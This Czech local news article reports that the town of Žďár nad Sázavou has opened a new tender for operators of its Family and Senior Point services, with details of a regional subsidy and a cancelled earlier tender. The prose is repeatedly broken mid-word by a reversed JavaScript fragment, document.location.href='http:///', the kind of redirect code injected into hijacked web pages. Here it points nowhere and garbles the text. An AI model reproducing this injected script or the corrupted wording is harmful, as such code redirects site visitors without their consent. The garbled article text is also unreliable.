Rainbow page separator

Žďár hledá nového provozovatele služeb Senior a Family Pointu

Neděle, 17. ledna 2021

Poliklinika Žďár nad Sázavou

Žďár nad Sázavou / Nové výběrové řízení na zajištění provozu Family a Senior Pointu, které do konce loňského roku fungovaly v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách polikliniky, vyhlásila žďárská radnice. Výsledkem má být zajištěný provoz od 1. března do konce roku.
Family a Senior Point pět let obstarávalo Kolpingovo dílo ČR, obě zařízení prostřednictvím města do[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval Kraj Vysočina. Krajská dotace činila 180 tisíc korun ročně na každý Point, celkem tedy 360 tisíc. Předchozí výběrové řízení, kam se přihlásil jenom původní provozovatel, měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to před Vánoci zrušilo. Taktéž při s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupajících nákladech Pointů odmítlo přispět na jejich provoz s tím, že jim v poliklinice poskytuje finančně výhodné nájemné. V rámci prorodinné politiky žďárská radnice podporuje i rodinné centrum Srdíčko sídlící ve stejných pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách jako oba Pointy, které také provozuje Kolpingovo dílo ČR. Od nového výběrového řízení si měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to slibuje provozovatele, který služby Family i Senior Pointu bude schopen zajistit za krajský příspěvek.
Family i Senior Pointy fungují ve všech vysočinských okresních městech, nyní s výjimkou Žďáru. Pro kraj, který jejich provoz financuje, je provozují různé spolky, příspěvkové organizace měst či kraje, případně města samotná. Služby žďárských zařízení využívaly s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky seniorů i rodin s dětmi. K dispozici jim byly aktivity v podobě přednášek, kreativních dílen, cvičení, individuálního poradenství a podobně.

ilustrační fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to